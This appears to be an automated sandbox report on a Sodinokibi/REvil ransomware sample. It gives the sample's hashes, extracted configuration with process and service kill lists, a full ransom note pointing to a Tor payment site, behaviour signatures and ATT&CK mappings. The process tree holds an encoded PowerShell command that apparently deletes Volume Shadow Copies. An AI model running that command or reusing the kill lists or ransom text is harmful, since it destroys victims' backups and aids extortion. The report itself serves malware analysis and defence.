Analysis

  • max time kernel
    119s
  • max time network
    127s
  • platform
    windows7_x64
  • resource
    win7-20240319-en
  • resource tags

    arch:x64arch:x86image:win7-20240319-enlocale:en-usos:windows7-x64system
  • submitted
    17-04-2024 13:16

General

  • Target

    78b592a2710d81fa91235b445f674ee804db39c8cc34f7e894b4e7b7f6eacaff.exe

  • Size

    119KB

  • MD5

    fa8117afd2dbd20513522f2f8e991262

  • SHA1

    f7b876edb8fc0c83fd8b665d3c5a1050d4396302

  • SHA256

    78b592a2710d81fa91235b445f674ee804db39c8cc34f7e894b4e7b7f6eacaff

  • SHA512

    2bab344d136b31cd7c55b7cd0ef1b7718c9952573f3b1478a2efb8211563d7dedacefd4764a7186e15f7de93cc43fa29fc4d2fa61961a14bb12d7bea830e5032

  • SSDEEP

    3072:KW5yc3Y4SMQwuOekD96R928AN+/uSxo+HHz/bs/k4OS:K83Y5BAxa92KrxTnz/Y/k4O

Malware Config

Extracted

Family

sodinokibi

Botnet

$2b$13$wz1reRfdLg.aiStLDqg5JeqqySemSPatWKHdwbpWVrC3ty7Akscg6

Campaign

49

Attributes
  • net

    false

  • pid

    $2b$13$wz1reRfdLg.aiStLDqg5JeqqySemSPatWKHdwbpWVrC3ty7Akscg6

  • prc

    vsnapvss

    EnterpriseClient

    firefox

    infopath

    cvd

    tv_x64.exe

    VeeamTransportSvc

    steam

    encsvc

    mydesktopservice

    outlook

    synctime

    ocssd

    SAP

    cvfwd

    bengien

    vxmon

    bedbh

    ocomm

    ocautoupds

    raw_agent_svc

    oracle

    disk+work

    powerpnt

    saposcol

    sqbcoreservice

    sapstartsrv

    beserver

    saphostexec

    dbeng50

    isqlplussvc

    CVODS

    DellSystemDetect

    CVMountd

    TeamViewer.exe

    dbsnmp

    thunderbird

    mspub

    wordpad

    visio

    benetns

    QBCFMonitorService

    TeamViewer_Service.exe

    tv_w32.exe

    QBIDPService

    winword

    thebat

    VeeamDeploymentSvc

    avagent

    QBDBMgrN

    mydesktopqos

    xfssvccon

    sql

    tbirdconfig

    CagService

    pvlsvr

    avscc

    VeeamNFSSvc

    onenote

    excel

    msaccess

    agntsvc

  • ransom_oneliner

    All of your files are encrypted! Find EDGEWATER-README.txt and follow instuctions

  • ransom_template

    ---=== Welcome. Again. ===--- [+] What's Happened? [+] Your files have been encrypted and currently unavailable. You can check it. All files in your system have {EXT} extension. By the way, everything is possible to recover (restore) but you should follow our instructions. Otherwise you can NEVER return your data. [+] What are our guarantees? [+] It's just a business and we care only about getting benefits. If we don't meet our obligations, nobody will deal with us. It doesn't hold our interest. So you can check the ability to restore your files. For this purpose you should visit our website where you can decrypt one file for free. That is our guarantee. It doesn't metter for us whether you cooperate with us or not. But if you don't, you'll lose your time and data cause only we have the private key to decrypt your files. In practice - time is much more valuable than money. [+] How to get access to our website? [+] Use TOR browser: 1. Download and install TOR browser from this site: https://torproject.org/ 2. Visit our website: http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion When you visit our website, put the following data into the input form: Key: {KEY} !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software or antivirus solutions to restore your data - it may entail the private key damage and as a result all your data loss! !!! !!! !!! ONE MORE TIME: It's in your best interests to get your files back. From our side we (the best specialists in this sphere) ready to make everything for restoring but please do not interfere. !!! !!! !!

  • sub

    49

  • svc

    QBCFMonitorService

    thebat

    dbeng50

    winword

    dbsnmp

    VeeamTransportSvc

    disk+work

    TeamViewer_Service.exe

    firefox

    QBIDPService

    steam

    onenote

    CVMountd

    cvd

    VeeamDeploymentSvc

    VeeamNFSSvc

    bedbh

    mydesktopqos

    avscc

    infopath

    cvfwd

    excel

    beserver

    powerpnt

    mspub

    synctime

    QBDBMgrN

    tv_w32.exe

    EnterpriseClient

    msaccess

    ocssd

    mydesktopservice

    sqbcoreservice

    CVODS

    DellSystemDetect

    oracle

    ocautoupds

    wordpad

    visio

    SAP

    bengien

    TeamViewer.exe

    agntsvc

    CagService

    avagent

    ocomm

    outlook

    saposcol

    xfssvccon

    isqlplussvc

    pvlsvr

    sql

    tbirdconfig

    vxmon

    benetns

    tv_x64.exe

    encsvc

    sapstartsrv

    vsnapvss

    raw_agent_svc

    thunderbird

    saphostexec

Extracted

Path

C:\Users\EDGEWATER-README.txt

Ransom Note
---=== Welcome. Again. ===--- [+] What's Happened? [+] Your files have been encrypted and currently unavailable. You can check it. All files in your system have 8c9136 extension. By the way, everything is possible to recover (restore) but you should follow our instructions. Otherwise you can NEVER return your data. [+] What are our guarantees? [+] It's just a business and we care only about getting benefits. If we don't meet our obligations, nobody will deal with us. It doesn't hold our interest. So you can check the ability to restore your files. For this purpose you should visit our website where you can decrypt one file for free. That is our guarantee. It doesn't metter for us whether you cooperate with us or not. But if you don't, you'll lose your time and data cause only we have the private key to decrypt your files. In practice - time is much more valuable than money. [+] How to get access to our website? [+] Use TOR browser: 1. Download and install TOR browser from this site: https://torproject.org/ 2. Visit our website: http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion When you visit our website, put the following data into the input form: Key: dsSv7xRshuCf7kXkj05pPBX0+mh/OP5uyCpKJgi02PTYzsSyFnBTlhcKNtwFCpiL hsiGF3pcqDLDTK5RCBHwC5q5LSsHKkk159lACjPhalYyXZoEkoJ5B6f6MrdZ4T9I yvqXhPySoduT3seOr7nqPyj6K5ecgW3kXbZpO1gJ46dnig2NPJIFs/WFVt6kirl3 lGBfB/nnaf3FAhGWD+gKs7Q54RElI1ibbOs0ru2neqYL+BgbZ9MYmu58F+3VW44e YXG3oKXwGozq5Z1cW4l8dVhCPoZFoDSjAjF6p39NxeIN1nlYfQAmmxPeLmkGUcyD vt24CCezGKpF6LdXDyP8BBKospAJhqPuw0ftyedrCcN/+MAYkYE3K+Qx7ebtTVpR o5m+S7lieFYR1+JKblD+g9GLKhEktkV3r1yZtmRu4Wg4xZPIa3IO9250JJz+NRZY voEiMbxvS7NIfERWczAn8aBy2tFZw5Gy0J935tEcn/0i72/QzEEr/8WBxuMDB0ce o1Rdo7s9XUVHlbqNfLVOqNlsigfhanMHdobUGkulgPW+sNSe6NoPfeEh+ySJtLfg HPToHP5HpYFSLWN19KVhIQI5C4pnw3PP3uFB/oN/XRLcyZcmatqJMZYwUJGgTJrd ctx81OuhSDmrSHcbVVsE9DYssCq/4J4RsVdwFRj9LUw7PW1I0W9RFXzbG8LXc0zl qGEq6wImIvJr27DeT8moucYoFX75rZAbLF9ZYciI6Q25zQRvJd3JQjiJaUUmkIAE yvbDh89COIBEaxYrv7r3pCXEPcDGn26SqtbUWCRccdyMD4i5bQiMqXzrVXSzmk/w 8Bx/LpsTPkZFw+B3Q3jHawrZEbj+Z4mFq5yba+FZfIWyYmkoNToD3PPdTvsr7615 IknvukELqslDaWGUkpb+TxYmSlm/rqb8cplvnGiuB8i+dWJetYwWhw4QVTzxdouJ HncptG62PcpluR9YBe9GgPLvCo7DeU3ilH4fdNXbWDJrNVK2Dp8nYzCfMlgAffyg y76UA6AoyvHfC6IWGtBqBIwlC8ZJeLre4gMq83ApFC4xUpqkrX4RSex/31WpSPZ0 HA8e5I8bMuYxLQCxCFW/KDVs8ZuwMlVsaM89P1Al0huj7jbWZqxMP5Y/Rod8FVve wq2u4Yo+fwBruUhybXFXzEXGY5AU3bLPkuv2+vjeNVdTDR5pPmVWWvBu5189sS6k 5tsVGAS6QfK0/LJnpg2crCH9IEeF822v7Iv15FnWigUavj7H0Bzdh9Fyrj49sXTU go10P8Gz+YKc4tinHcAOAovqy1lIHLQiD89wi7UTU9rF9bVQFdEDTW3dUNq7eGrz E2DF5BzCPy/1LBxxjNQsFla/4ZLY/RUL3QByVg== !!! DANGER !!! DON'T try to change files by yourself, DON'T use any third party software or antivirus solutions to restore your data - it may entail the private key damage and as a result all your data loss! !!! !!! !!! ONE MORE TIME: It's in your best interests to get your files back. From our side we (the best specialists in this sphere) ready to make everything for restoring but please do not interfere. !!! !!! !!
URLs

http://4to43yp4mng2gdc3jgnep5bt7lkhqvjqiritbv4x2ebj3qun7wz4y2id.onion

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\78b592a2710d81fa91235b445f674ee804db39c8cc34f7e894b4e7b7f6eacaff.exe
    "C:\Users\Admin\AppData\Local\Temp\78b592a2710d81fa91235b445f674ee804db39c8cc34f7e894b4e7b7f6eacaff.exe"
    1⤵
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2876
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1080
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:2812
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2708

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    1
    T1012

    Peripheral Device Discovery

    1
    T1120

    System Information Discovery

    1
    T1082

    Impact

    Defacement

    1
    T1491

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\EDGEWATER-README.txt
      Filesize

      6KB

      MD5

      ecc5370acf766b8138e24f9ae243498f

      SHA1

      53e9894be7c305c20ba95913232f6fdb656d5cd4

      SHA256

      18d101e3bce6901931ffd61fd3a5618e19fdf2adfc625577160a5252767e174b

      SHA512

      5afc6221e4cd9e45b0216c9d66e9f776adbb4dab0dcd65da681791ce5cfe1e1e7673c71a3874c04dfbcd5c8b04f08944be4e30e0ec98cf11eb98917793592c7d

    • memory/1080-10-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp
      Filesize

      9.6MB

    • memory/1080-6-0x000000001B320000-0x000000001B602000-memory.dmp
      Filesize

      2.9MB

    • memory/1080-7-0x0000000001D70000-0x0000000001D78000-memory.dmp
      Filesize

      32KB

    • memory/1080-8-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp
      Filesize

      9.6MB

    • memory/1080-9-0x0000000002520000-0x00000000025A0000-memory.dmp
      Filesize

      512KB

    • memory/1080-11-0x0000000002520000-0x00000000025A0000-memory.dmp
      Filesize

      512KB

    • memory/1080-12-0x0000000002520000-0x00000000025A0000-memory.dmp
      Filesize

      512KB

    • memory/1080-14-0x000007FEF5F90000-0x000007FEF692D000-memory.dmp
      Filesize

      9.6MB

    • memory/2876-0-0x0000000000020000-0x0000000000040000-memory.dmp
      Filesize

      128KB

    • memory/2876-13-0x0000000000020000-0x0000000000040000-memory.dmp
      Filesize

      128KB

    • memory/2876-1-0x0000000000020000-0x0000000000040000-memory.dmp
      Filesize

      128KB

    • memory/2876-494-0x0000000000020000-0x0000000000040000-memory.dmp
      Filesize

      128KB

    • memory/2876-512-0x0000000000020000-0x0000000000040000-memory.dmp
      Filesize

      128KB